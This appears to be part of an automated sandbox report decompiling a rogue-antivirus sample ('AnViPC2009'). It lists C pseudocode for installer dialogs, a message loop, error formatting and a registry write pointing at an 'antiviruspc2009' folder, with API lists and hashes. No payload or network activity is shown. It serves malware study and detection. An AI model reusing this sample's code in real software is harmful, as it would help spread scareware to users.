                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileName$OpenSave$CommCurrentDirectoryErrorExtended
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1809602070-0
                                                                                                                                                  • Opcode ID: 8b641a37d2e3cded532aa378942fbf2e671189089aa577b060b958644557db49
                                                                                                                                                  • Instruction ID: 3fc8b8bfb49f4cbb00dcab2165558d5f44084b3bd698ed4426c068d94847fa5b
                                                                                                                                                  • Opcode Fuzzy Hash: 8b641a37d2e3cded532aa378942fbf2e671189089aa577b060b958644557db49
                                                                                                                                                  • Instruction Fuzzy Hash: 1A31A0759012199BCB11EFA98D49BCF7BB8AF44354F10802BFA04F3281C7789955CBAA
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                  			E004064BF(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				long _v16;
                                                                                                                                                  				struct tagMSG _v44;
                                                                                                                                                  				long _t24;
                                                                                                                                                  				intOrPtr* _t29;
                                                                                                                                                  				intOrPtr* _t32;
                                                                                                                                                  				intOrPtr* _t34;
                                                                                                                                                  				intOrPtr* _t36;
                                                                                                                                                  				struct HWND__* _t46;
                                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                                  
                                                                                                                                                  				_t46 = 0;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_t24 = GetTickCount();
                                                                                                                                                  				_t53 = _a4;
                                                                                                                                                  				_v16 = _t24;
                                                                                                                                                  				while(1) {
                                                                                                                                                  					_push( &_v12);
                                                                                                                                                  					_push(_t53);
                                                                                                                                                  					if( *((intOrPtr*)( *_t53 + 0x48))() >= 0 && _v12 != _t46) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					if(GetTickCount() - _v16 > 0x2710) {
                                                                                                                                                  						break;
                                                                                                                                                  					} else {
                                                                                                                                                  						if(PeekMessageA( &_v44, _t46, _t46, _t46, _t46) != 0) {
                                                                                                                                                  							GetMessageA( &_v44, _t46, _t46, _t46);
                                                                                                                                                  							TranslateMessage( &_v44);
                                                                                                                                                  							DispatchMessageA( &_v44);
                                                                                                                                                  						}
                                                                                                                                                  						continue;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t29 = _v12;
                                                                                                                                                  				if(_t29 != _t46) {
                                                                                                                                                  					_push( &_v8);
                                                                                                                                                  					_push(0x412858);
                                                                                                                                                  					_push(_t29);
                                                                                                                                                  					if( *((intOrPtr*)( *_t29))() >= 0) {
                                                                                                                                                  						_t32 = _v8;
                                                                                                                                                  						_push(_t32);
                                                                                                                                                  						if( *((intOrPtr*)( *_t32 + 0x20))() >= 0) {
                                                                                                                                                  							_t36 = _v8;
                                                                                                                                                  							_t46 = _t46 & 0xffffff00 |  *((intOrPtr*)( *_t36 + 0x14))(_t36, _a8) >= 0x00000000;
                                                                                                                                                  						}
                                                                                                                                                  						_t34 = _v8;
                                                                                                                                                  						 *((intOrPtr*)( *_t34 + 8))(_t34);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t46;
                                                                                                                                                  			}














                                                                                                                                                  0x004064cd
                                                                                                                                                  0x004064d0
                                                                                                                                                  0x004064d3
                                                                                                                                                  0x004064d6
                                                                                                                                                  0x004064d8
                                                                                                                                                  0x004064db
                                                                                                                                                  0x004064de
                                                                                                                                                  0x004064e3
                                                                                                                                                  0x004064e4
                                                                                                                                                  0x004064ea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004064fb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004064fd
                                                                                                                                                  0x0040650d
                                                                                                                                                  0x00406516
                                                                                                                                                  0x00406520
                                                                                                                                                  0x0040652a
                                                                                                                                                  0x0040652a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040650d
                                                                                                                                                  0x004064fb
                                                                                                                                                  0x00406532
                                                                                                                                                  0x00406537
                                                                                                                                                  0x0040653e
                                                                                                                                                  0x0040653f
                                                                                                                                                  0x00406544
                                                                                                                                                  0x00406549
                                                                                                                                                  0x0040654b
                                                                                                                                                  0x00406550
                                                                                                                                                  0x00406556
                                                                                                                                                  0x00406558
                                                                                                                                                  0x00406566
                                                                                                                                                  0x00406566
                                                                                                                                                  0x00406569
                                                                                                                                                  0x0040656f
                                                                                                                                                  0x0040656f
                                                                                                                                                  0x00406549
                                                                                                                                                  0x00406578

                                                                                                                                                  APIs
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 004064D6
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 004064F1
                                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00406505
                                                                                                                                                  • GetMessageA.USER32 ref: 00406516
                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00406520
                                                                                                                                                  • DispatchMessageA.USER32 ref: 0040652A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$CountTick$DispatchPeekTranslate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3906477200-0
                                                                                                                                                  • Opcode ID: 627e4e436f17076fa03f17ff94e42819feb2b054caf09be72856c85dd9c5ed32
                                                                                                                                                  • Instruction ID: afe5134b9435a3290b6b6510f0e4d264152f229aed93d055ae6497dd3edfb6b5
                                                                                                                                                  • Opcode Fuzzy Hash: 627e4e436f17076fa03f17ff94e42819feb2b054caf09be72856c85dd9c5ed32
                                                                                                                                                  • Instruction Fuzzy Hash: B321C571A00109AFDB00DFA9DD88DDEBBBCEF48745B1484AAE502E7260D774DE55CB24
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040BB63(char* _a4, long _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                  				int _t14;
                                                                                                                                                  				void* _t15;
                                                                                                                                                  				void* _t18;
                                                                                                                                                  				char* _t19;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				char* _t23;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  				char* _t26;
                                                                                                                                                  
                                                                                                                                                  				while(1) {
                                                                                                                                                  					 *0x419ee0 = _a12;
                                                                                                                                                  					 *0x419ee4 = _a16;
                                                                                                                                                  					 *0x419ed8 = _a20;
                                                                                                                                                  					if( *0x419ede == 0) {
                                                                                                                                                  						if( *0x419edf == 0) {
                                                                                                                                                  							_t14 = DialogBoxParamA( *0x414c74, "REPLACEFILEDLG",  *0x419f80, E0040AE70, _a8);
                                                                                                                                                  						} else {
                                                                                                                                                  							_t14 = 2;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						_t14 = 1;
                                                                                                                                                  					}
                                                                                                                                                  					_t15 = _t14 - 1;
                                                                                                                                                  					if(_t15 == 0) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					_t18 = _t15 - 1;
                                                                                                                                                  					if(_t18 == 0) {
                                                                                                                                                  						L15:
                                                                                                                                                  						_t19 = _a4;
                                                                                                                                                  						 *_t19 = 0x4e;
                                                                                                                                                  						return _t19;
                                                                                                                                                  					}
                                                                                                                                                  					_t20 = _t18 - 1;
                                                                                                                                                  					if(_t20 == 0) {
                                                                                                                                                  						 *0x419ede = 1;
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					_t21 = _t20 - 1;
                                                                                                                                                  					if(_t21 != 0) {
                                                                                                                                                  						_t22 = _t21 - 1;
                                                                                                                                                  						if(_t22 == 0) {
                                                                                                                                                  							_t23 = _a4;
                                                                                                                                                  							 *0x419f78 = 1;
                                                                                                                                                  							 *_t23 = 0x43;
                                                                                                                                                  							return _t23;
                                                                                                                                                  						}
                                                                                                                                                  						_t24 = _t22 - 1;
                                                                                                                                                  						if(_t24 != 0) {
                                                                                                                                                  							return _t24;
                                                                                                                                                  						}
                                                                                                                                                  						 *0x419edf = 1;
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					if(DialogBoxParamA( *0x414c74, "RENAMEDLG",  *0x419f80, E0040B16C, _a8) == 0) {
                                                                                                                                                  						continue;
                                                                                                                                                  					}
                                                                                                                                                  					_t26 = _a4;
                                                                                                                                                  					 *_t26 = 0x52;
                                                                                                                                                  					return _t26;
                                                                                                                                                  				}
                                                                                                                                                  				 *_a4 = 0x59;
                                                                                                                                                  				return SetFileAttributesA(_a8, 0);
                                                                                                                                                  			}













                                                                                                                                                  0x0040bb6d
                                                                                                                                                  0x0040bb77
                                                                                                                                                  0x0040bb7f
                                                                                                                                                  0x0040bb87
                                                                                                                                                  0x0040bb8c
                                                                                                                                                  0x0040bb9a
                                                                                                                                                  0x0040bbba
                                                                                                                                                  0x0040bb9c
                                                                                                                                                  0x0040bb9e
                                                                                                                                                  0x0040bb9e
                                                                                                                                                  0x0040bb8e
                                                                                                                                                  0x0040bb90
                                                                                                                                                  0x0040bb90
                                                                                                                                                  0x0040bbbc
                                                                                                                                                  0x0040bbbd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbbf
                                                                                                                                                  0x0040bbc0
                                                                                                                                                  0x0040bbfc
                                                                                                                                                  0x0040bbfc
                                                                                                                                                  0x0040bbff
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbff
                                                                                                                                                  0x0040bbc2
                                                                                                                                                  0x0040bbc3
                                                                                                                                                  0x0040bc16
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bc16
                                                                                                                                                  0x0040bbc5
                                                                                                                                                  0x0040bbc6
                                                                                                                                                  0x0040bbef
                                                                                                                                                  0x0040bbf0
                                                                                                                                                  0x0040bc04
                                                                                                                                                  0x0040bc07
                                                                                                                                                  0x0040bc11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bc11
                                                                                                                                                  0x0040bbf2
                                                                                                                                                  0x0040bbf3
                                                                                                                                                  0x0040bc30
                                                                                                                                                  0x0040bc30
                                                                                                                                                  0x0040bbf5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbf5
                                                                                                                                                  0x0040bbe5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbe7
                                                                                                                                                  0x0040bbea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbea
                                                                                                                                                  0x0040bc25
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DialogParam
                                                                                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                  • API String ID: 665744214-56093855
                                                                                                                                                  • Opcode ID: 9f7391a969908141affd3e1506dfeb8c0551ac1ff87ee18be0e998d9c8f1eadc
                                                                                                                                                  • Instruction ID: 7fae9892f9a237f55cab6e7937486e9afdf0d110a154038ee0e2284b36008d7f
                                                                                                                                                  • Opcode Fuzzy Hash: 9f7391a969908141affd3e1506dfeb8c0551ac1ff87ee18be0e998d9c8f1eadc
                                                                                                                                                  • Instruction Fuzzy Hash: 86214C34158249ABDB11CF24DC11BD63FA0E705344F188076E901AA2E5C7B9AD50DBAD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                  			E0040B16C(struct HWND__* _a4, intOrPtr _a8, signed short _a12, CHAR* _a16) {
                                                                                                                                                  				void* _t9;
                                                                                                                                                  				void* _t17;
                                                                                                                                                  				struct HWND__* _t21;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				CHAR* _t23;
                                                                                                                                                  
                                                                                                                                                  				_t21 = _a4;
                                                                                                                                                  				_t23 = _a16;
                                                                                                                                                  				E00403059(_t22, _t21, _a8, _a12, _t23, "RENAMEDLG", 0, 0);
                                                                                                                                                  				_t9 = _a8 - 0x110;
                                                                                                                                                  				if(_t9 == 0) {
                                                                                                                                                  					 *0x41f320 = _t23;
                                                                                                                                                  					SetDlgItemTextA(_t21, 0x65, _t23);
                                                                                                                                                  					SetDlgItemTextA(_t21, 0x66, _t23);
                                                                                                                                                  					L9:
                                                                                                                                                  					return 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t9 != 1) {
                                                                                                                                                  					L4:
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t17 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                  				if(_t17 == 0) {
                                                                                                                                                  					SendDlgItemMessageA(_t21, 0x66, 0xd, 0x50,  *0x41f320);
                                                                                                                                                  					_push(1);
                                                                                                                                                  					L6:
                                                                                                                                                  					EndDialog(_t21, ??);
                                                                                                                                                  					goto L9;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t17 == 1) {
                                                                                                                                                  					_push(0);
                                                                                                                                                  					goto L6;
                                                                                                                                                  				}
                                                                                                                                                  				goto L4;
                                                                                                                                                  			}








                                                                                                                                                  0x0040b170
                                                                                                                                                  0x0040b175
                                                                                                                                                  0x0040b189
                                                                                                                                                  0x0040b191
                                                                                                                                                  0x0040b196
                                                                                                                                                  0x0040b1d4
                                                                                                                                                  0x0040b1da
                                                                                                                                                  0x0040b1e0
                                                                                                                                                  0x0040b1e2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b1e4
                                                                                                                                                  0x0040b199
                                                                                                                                                  0x0040b1a5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b1a5
                                                                                                                                                  0x0040b19f
                                                                                                                                                  0x0040b1a0
                                                                                                                                                  0x0040b1c0
                                                                                                                                                  0x0040b1c6
                                                                                                                                                  0x0040b1aa
                                                                                                                                                  0x0040b1ab
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b1ab
                                                                                                                                                  0x0040b1a3
                                                                                                                                                  0x0040b1a9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b1a9
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 0040B1AB
                                                                                                                                                  • SendDlgItemMessageA.USER32(?,00000066,0000000D,00000050,?), ref: 0040B1C0
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040B1DA
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040B1E0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Item$Text$DialogMessageSend
                                                                                                                                                  • String ID: RENAMEDLG
                                                                                                                                                  • API String ID: 1109518134-3299779563
                                                                                                                                                  • Opcode ID: 3fbf5bdcea51cc42e20824fde63b58d57c09e04d5c0432ec42e38d30058d4e34
                                                                                                                                                  • Instruction ID: bf5bbbd193f32c1bedadc85709c849c00436e1c41758884dc092393b0bbf659d
                                                                                                                                                  • Opcode Fuzzy Hash: 3fbf5bdcea51cc42e20824fde63b58d57c09e04d5c0432ec42e38d30058d4e34
                                                                                                                                                  • Instruction Fuzzy Hash: 5801B172100218B6D7205FA2AC48FA73F2DEB457D0F004422B619A90C0C7B99821D7BC
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040B908(void* __esi, char* _a4) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				int _v12;
                                                                                                                                                  				char _v1036;
                                                                                                                                                  				long _t9;
                                                                                                                                                  				void* _t19;
                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                  				intOrPtr _t24;
                                                                                                                                                  
                                                                                                                                                  				_t23 =  *0x419f90; // 0x0
                                                                                                                                                  				if(_t23 != 0) {
                                                                                                                                                  					_t24 =  *0x418ed0; // 0x43
                                                                                                                                                  					if(_t24 != 0) {
                                                                                                                                                  						E0040B8DA( &_v1036, "C:\Program Files (x86)\antiviruspc2009");
                                                                                                                                                  						_t9 = RegCreateKeyExA(0x80000001, "Software\\WinRAR SFX", 0, 0, 0, 0x20006, 0,  &_v8,  &_v12);
                                                                                                                                                  						if(_t9 == 0) {
                                                                                                                                                  							RegSetValueExA(_v8,  &_v1036, 0, 1, _a4, E0040A35D(_t19, _a4) + 1);
                                                                                                                                                  							return RegCloseKey(_v8);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t9;
                                                                                                                                                  			}










                                                                                                                                                  0x0040b914
                                                                                                                                                  0x0040b91a
                                                                                                                                                  0x0040b91c
                                                                                                                                                  0x0040b922
                                                                                                                                                  0x0040b930
                                                                                                                                                  0x0040b950
                                                                                                                                                  0x0040b959
                                                                                                                                                  0x0040b975
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b97e
                                                                                                                                                  0x0040b959
                                                                                                                                                  0x0040b922
                                                                                                                                                  0x0040b986

                                                                                                                                                  APIs
                                                                                                                                                  • RegCreateKeyExA.ADVAPI32(80000001,Software\WinRAR SFX,00000000,00000000,00000000,00020006,00000000,?,?,C:\Program Files (x86)\antiviruspc2009,?,00000000), ref: 0040B950
                                                                                                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000001,?), ref: 0040B975
                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040B97E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                                  • String ID: C:\Program Files (x86)\antiviruspc2009$Software\WinRAR SFX
                                                                                                                                                  • API String ID: 1818849710-3504043858
                                                                                                                                                  • Opcode ID: bb2666ba06deac227cf65bb7cd8f303db7ff7d91d5871e941530142aac470636
                                                                                                                                                  • Instruction ID: 94608505a7990a78563a11b73d6731a43fbb77e82655d4229a1030d46660d902
                                                                                                                                                  • Opcode Fuzzy Hash: bb2666ba06deac227cf65bb7cd8f303db7ff7d91d5871e941530142aac470636
                                                                                                                                                  • Instruction Fuzzy Hash: 990162B2400208BEEB109B909D41EEBBF2DEB04388F144176BB41B1161D7755E559B6C
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040B282(CHAR* _a8, char _a12) {
                                                                                                                                                  				char _v4100;
                                                                                                                                                  				char* _t7;
                                                                                                                                                  				void* _t13;
                                                                                                                                                  				long _t17;
                                                                                                                                                  
                                                                                                                                                  				_t7 = E00401200(0x1000);
                                                                                                                                                  				if( *0x419f78 == 0) {
                                                                                                                                                  					_t7 = _a8;
                                                                                                                                                  					if( *_t7 != 0) {
                                                                                                                                                  						_t17 = GetLastError();
                                                                                                                                                  						_t2 =  &_a12; // 0x405524
                                                                                                                                                  						wvsprintfA( &_v4100, _a8, _t2);
                                                                                                                                                  						_t13 = E0040AE33(0x4122e8,  &_v4100);
                                                                                                                                                  						if(_t17 != 0) {
                                                                                                                                                  							SetLastError(_t17);
                                                                                                                                                  						}
                                                                                                                                                  						return _t13;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t7;
                                                                                                                                                  			}







                                                                                                                                                  0x0040b28a
                                                                                                                                                  0x0040b296
                                                                                                                                                  0x0040b298
                                                                                                                                                  0x0040b29e
                                                                                                                                                  0x0040b2a7
                                                                                                                                                  0x0040b2a9
                                                                                                                                                  0x0040b2b7
                                                                                                                                                  0x0040b2c9
                                                                                                                                                  0x0040b2d2
                                                                                                                                                  0x0040b2d5
                                                                                                                                                  0x0040b2d5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b2db
                                                                                                                                                  0x0040b29e
                                                                                                                                                  0x0040b2dd

                                                                                                                                                  APIs
                                                                                                                                                  • GetLastError.KERNEL32(00414C7C,?,004032B5,00000000,00000000,00000076,?,00000000,00404F68,00000017,00000000,00000000,00405470,?), ref: 0040B2A1
                                                                                                                                                  • wvsprintfA.USER32 ref: 0040B2B7
                                                                                                                                                    • Part of subcall function 0040AE33: wvsprintfA.USER32 ref: 0040AE54
                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,004032B5,00000000,00000000,00000076,?,00000000,00404F68,00000017,00000000,00000000,00405470,?), ref: 0040B2D5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastwvsprintf
                                                                                                                                                  • String ID: $U@$@Mhv
                                                                                                                                                  • API String ID: 2157943386-2784920949
                                                                                                                                                  • Opcode ID: d391b88f515a35b3e87bcca2f0aea1a2c18b4a1e5f912cd449dcf2cdc037324f
                                                                                                                                                  • Instruction ID: 30691480426cebebafc6dae7b5d85055ca5b8c6d57f7dc118ad4b386da44dbcc
                                                                                                                                                  • Opcode Fuzzy Hash: d391b88f515a35b3e87bcca2f0aea1a2c18b4a1e5f912cd449dcf2cdc037324f
                                                                                                                                                  • Instruction Fuzzy Hash: 5CF05E32404219AFDB129B64DC48BEE37A8EB05355F0440AAF805E62D0D7B89A958B9D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00406C31(void* __ebx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                  				void* _t7;
                                                                                                                                                  				void* _t11;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  				long _t26;
                                                                                                                                                  				struct HWND__* _t27;
                                                                                                                                                  
                                                                                                                                                  				_t7 = _a8 - 1;
                                                                                                                                                  				_t27 = _a4;
                                                                                                                                                  				_t26 = _a16;
                                                                                                                                                  				if(_t7 == 0) {
                                                                                                                                                  					E00406B8E(__ebx, GetWindowLongA(_t27, 0xffffffeb), __eflags, _t27);
                                                                                                                                                  				} else {
                                                                                                                                                  					_t11 = _t7 - 1;
                                                                                                                                                  					if(_t11 == 0) {
                                                                                                                                                  						E00406475(GetWindowLongA(_t27, 0xffffffeb));
                                                                                                                                                  					} else {
                                                                                                                                                  						_t14 = _t11 - 3;
                                                                                                                                                  						if(_t14 == 0) {
                                                                                                                                                  							E004064A4(GetWindowLongA(_t27, 0xffffffeb), _t26 & 0x0000ffff, _t26 >> 0x10);
                                                                                                                                                  						} else {
                                                                                                                                                  							if(_t14 == 0x7c) {
                                                                                                                                                  								SetWindowLongA(_t27, 0xffffffeb,  *_t26);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return DefWindowProcA(_t27, _a8, _a12, _t26);
                                                                                                                                                  			}








                                                                                                                                                  0x00406c37
                                                                                                                                                  0x00406c39
                                                                                                                                                  0x00406c3d
                                                                                                                                                  0x00406c40
                                                                                                                                                  0x00406c96
                                                                                                                                                  0x00406c42
                                                                                                                                                  0x00406c42
                                                                                                                                                  0x00406c43
                                                                                                                                                  0x00406c83
                                                                                                                                                  0x00406c45
                                                                                                                                                  0x00406c45
                                                                                                                                                  0x00406c48
                                                                                                                                                  0x00406c71
                                                                                                                                                  0x00406c4a
                                                                                                                                                  0x00406c4d
                                                                                                                                                  0x00406c54
                                                                                                                                                  0x00406c54
                                                                                                                                                  0x00406c4d
                                                                                                                                                  0x00406c48
                                                                                                                                                  0x00406c43
                                                                                                                                                  0x00406cac

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Long$Proc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3468714886-0
                                                                                                                                                  • Opcode ID: 5b6488ec1d90df0595f4f4a9305c77c29eaa8b8cf69bc4252cccd780c0b04db9
                                                                                                                                                  • Instruction ID: b0deada768a9c0b0a5749325179a27a2743b231c5d97017feb3ce6524bfdf74a
                                                                                                                                                  • Opcode Fuzzy Hash: 5b6488ec1d90df0595f4f4a9305c77c29eaa8b8cf69bc4252cccd780c0b04db9
                                                                                                                                                  • Instruction Fuzzy Hash: 0201843110911477DF042F69AE18CAF3669DE8A320311473BF557F22E1CB78A931966E
                                                                                                                                                  Uniqueness

